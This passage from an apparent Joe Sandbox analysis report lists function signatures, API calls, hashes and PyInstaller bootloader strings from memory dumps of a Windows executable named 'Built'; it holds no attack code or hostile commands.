                                                              • Opcode Fuzzy Hash: 5b2c1e9fc095e7eb3c431b17fb97200263da2875c903d2763a27b9f49e70b7d5
                                                              • Instruction Fuzzy Hash: F041A021B0865382EE20DB12EC616B9A394FF94BC4F544432ED0C97796DE7EE105AB43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2050909247-3659356012
                                                              • Opcode ID: d4058f359e5534e9154332fa8772b655c13ee2f9ca662c036acda7bf9a757419
                                                              • Instruction ID: 00508e2fa628a3a4224fb5adf984a65d0b285a962d10c54d4631fa3a1e666b1c
                                                              • Opcode Fuzzy Hash: d4058f359e5534e9154332fa8772b655c13ee2f9ca662c036acda7bf9a757419
                                                              • Instruction Fuzzy Hash: 5241AC72A0864395EE20DB21EC511F9A390BF84784F444532ED1D97B96DE7EE542EF03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                              • Instruction ID: 5f6e5a8d7ce8e0709680fd795fe98228c59e7ffb7f5205fd67780d0096b8d917
                                                              • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                              • Instruction Fuzzy Hash: 5AD18272A087818AEF309BA5D8503AE37A0FB95788F100135EE4D97B95DF7AE440DB43
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
                                                              • MessageBoxW.USER32 ref: 00007FF626642D99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Message$CurrentFormatProcess
                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                              • API String ID: 3940978338-251083826
                                                              • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                              • Instruction ID: 704e3d742f45a51c86662386fcc1f1352d8b00ffb4fe915c2e67ada048d927d3
                                                              • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                              • Instruction Fuzzy Hash: 4F31F622708A4182EA20AB21BC502BA6795BF88BC8F400136EF4DD7759DF7DD516DB02
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDBD
                                                              • GetLastError.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDCB
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDF5
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DE63
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DE6F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                              • Instruction ID: dc1dd23729fa22ae003e52b2d1ea072889ce2dd6ba4bf803454c64b692098f93
                                                              • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                              • Instruction Fuzzy Hash: B931D021F0A68381EE229B02AC501B8A394FF58BA4F490535EE1D873C0EF7DE4449B43
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                              • API String ID: 2050909247-2434346643
                                                              • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                              • Instruction ID: b283aa1ef220967a4053d6e22b7cd11b26a61899172bbdd7b2bd60c6bb27fab1
                                                              • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                              • Instruction Fuzzy Hash: 5F419E31A0CA8791EE21DB20EC642E96325FB54384F904132EA5DC3695EF7DE615DB83
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62664351A,?,00000000,00007FF626643F23), ref: 00007FF626642AA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                              • API String ID: 2050909247-2900015858
                                                              • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                              • Instruction ID: 3707d47eab5bf1ef0d49f47ec56f42d6f9429d0dfec2962f956a368fa293a6aa
                                                              • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                              • Instruction Fuzzy Hash: DC21AE32A18B8292EA209B51BC917EA6394FB887C4F400132FE8D93759DF7DD2559B42
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                              • Instruction ID: 49f71f9c23f1e9b9ed64852648cddfe5d10437cfa9a45b5b27e1caaa3223b5ad
                                                              • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                              • Instruction Fuzzy Hash: 23214820E0C20786FE65A7619E6313D5142BF447A0F144634E93ECAAD7DE2FA400AF43
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                              • Instruction ID: 0cabc9d54a84eb1bb6e8698cd9d8ef80d2bf1fa14d70118ab14268c824f39381
                                                              • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                              • Instruction Fuzzy Hash: B0116031B18A4286EB508B52FC54339A7A4FB88BE4F044234EA5DCB7A4DF7DD8549B42
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF626649216), ref: 00007FF626648592
                                                              • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266485E9
                                                                • Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439
                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF626648678
                                                              • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266486E4
                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266486F5
                                                              • FreeLibrary.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF62664870A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                              • String ID:
                                                              • API String ID: 3462794448-0
                                                              • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                              • Instruction ID: e9fbdee87210709e9c98904fdfba6af056407c53d33398781a02956b683732ee
                                                              • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                              • Instruction Fuzzy Hash: 90418322B196C281EE709F12A9606AA6394FB84BC4F440135DE4DD7B89DE7DE401DB03
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B347
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B37D
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3AA
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3BB
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3CC
                                                              • SetLastError.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3E7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                              • Instruction ID: 8d4df20984a9d2da6d39dd54753969e431821b778c3e6885988722b320830fc1
                                                              • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                              • Instruction Fuzzy Hash: 0C116D20A0C64386FE54A3219E6313D6242BF447B0F144335E82EDA7C7DE2EA801AF43
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF626641B6A), ref: 00007FF62664295E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                              • API String ID: 2050909247-2962405886
                                                              • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                              • Instruction ID: f28a71460cd9599f0d07796ee5e64200ca790fcaf93a4e55c426e5d07c38cad7
                                                              • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                              • Instruction Fuzzy Hash: A0313522B1868292EB20A761BC516FA6394BF887D4F400132FE8DC3749EF7DD556DB02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                              • String ID: Unhandled exception in script
                                                              • API String ID: 3081866767-2699770090
                                                              • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                              • Instruction ID: b87cae1656d9ddd69439b409bb070a0faf5aef8027568092723290d009f800f4
                                                              • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                              • Instruction Fuzzy Hash: 26315C32A19A8289EF24DB61FC552F96360FF88784F440135EA4D8BB4ADF3DD104DB02
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62664918F,?,00007FF626643C55), ref: 00007FF626642BA0
                                                              • MessageBoxW.USER32 ref: 00007FF626642C2A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentMessageProcess
                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                              • API String ID: 1672936522-3797743490
                                                              • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                              • Instruction ID: 6c43680de41562ca9894786e3b91a250a1d41bf50f619e9c00fe59142ee3e928
                                                              • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                              • Instruction Fuzzy Hash: B521D122708B4282EB20DB14F8847AA73A4FB887C4F400132EA8D9775ADF3DD215CB42
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF626641B99), ref: 00007FF626642760
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                              • API String ID: 2050909247-1591803126
                                                              • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                              • Instruction ID: 415d3ceed63b74284f471c72a154b0ce66c9e97bab927fe4a514e6e95b9d6968
                                                              • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                              • Instruction Fuzzy Hash: DD21AE72A18B8292EB20DB50BC917EA6394FB883C4F400132FE8C97759DF7DD6559B42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                              • Instruction ID: 605d36a21f3f64420109a094b3a562c99078770a1591395129ff42fa4cd5ada7
                                                              • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                              • Instruction Fuzzy Hash: 26F0AF21B0860782FE108B20EC8533A6320FF84761F440235CA6E861E4DF2ED048EB03
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction ID: 839da728aebb9bb77556e17cd32a6103cff6846385891e8410bf06912e5219f9
                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction Fuzzy Hash: 88118F72E5CA1301FF5C1525FC5637620447F59374E040734EE7EC62DA8EAEA941AB07
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B41F
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B43E
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B466
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B477
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62665A613,?,?,00000000,00007FF62665A8AE,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665B488
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true
                                                              • Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                              • Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
